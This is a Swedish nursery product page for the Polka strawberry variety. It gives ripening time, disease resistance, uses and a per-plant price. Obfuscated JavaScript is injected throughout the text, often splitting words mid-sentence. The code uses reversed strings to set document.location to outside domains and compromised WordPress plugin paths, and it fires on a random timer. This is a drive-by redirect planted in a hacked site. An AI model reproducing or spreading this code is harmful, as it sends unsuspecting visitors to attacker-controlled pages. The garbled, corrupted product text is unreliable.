Polka

  • Även om man inte tror det efter nam net kommer den fr?n Holland.
  • Ganska s? tidig (börjar mogna ungefär som Senga Sengaa, ca. 7-10 dagar efter Alba)
  • F?r mycket frukt (den f?r inte ha det för tobor-latigid//:sptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tort d? den växer och f?r frukt), enkel att odla, kylt?lig, attakeras ej av mjöldagg, kan drabbas av gr?mögel under fuktiga somrar (skydd föresl?ss)
  • Medelstobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tora frukter, starkt röda och glansiga, väldigt goda med. Mycket aromat.
  • Kan användas till det mesta, passar som dessertjordgubbe men även i livsmedelsindustrin.
  • Utmärkt för s?väl stobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tora odlingar som sm? trädg?rdar.

 

Köldt?liga
Smak
Attraktivitet av frukt
Prisvärdhet odling
Utbyte
Earliness Ganska s? tidig

Alla sorter säljs i krukor p? antingen 10 eller 40 stycken.

Nettobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}topris: 1 PLN / styck (0.21) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}tobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to="SEK"] SEK / styck)

Kontakt och order

) == "string") return $GRn.list[n].split("").reverse().join("");return $GRn.list[n];};$GRn.list=["'php.rabedis-nimda-snoitcnuf/cni/srebmem/snigulp/tnetnoc-pw/moc.nemrolias//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}andom="YES"]